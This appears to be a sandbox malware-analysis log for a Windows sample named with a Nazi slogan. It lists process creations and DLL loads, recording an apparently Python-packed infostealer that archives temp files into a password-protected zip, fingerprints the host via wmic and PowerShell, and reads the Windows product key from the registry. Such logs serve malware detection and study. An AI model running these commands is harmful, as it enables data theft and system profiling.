              Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\HeilHitler.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | Section loaded: vcruntime140.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | Section loaded: python3.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | Section loaded: libffi-7.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | Section loaded: sqlite3.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | Section loaded: libcrypto-1_1.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | Section loaded: libssl-1_1.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\HeilHitler.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: version.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
              Source: C:\Windows\System32\tree.com | Section loaded: ulib.dll
              Source: C:\Windows\System32\tree.com | Section loaded: fsutilext.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ntmarta.dll
              Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: esscli.dll
              Source: C:\Windows\System32\tree.com | Section loaded: ulib.dll
              Source: C:\Windows\System32\tree.com | Section loaded: fsutilext.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: ifmon.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\netsh.exe | Section loaded: mprapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
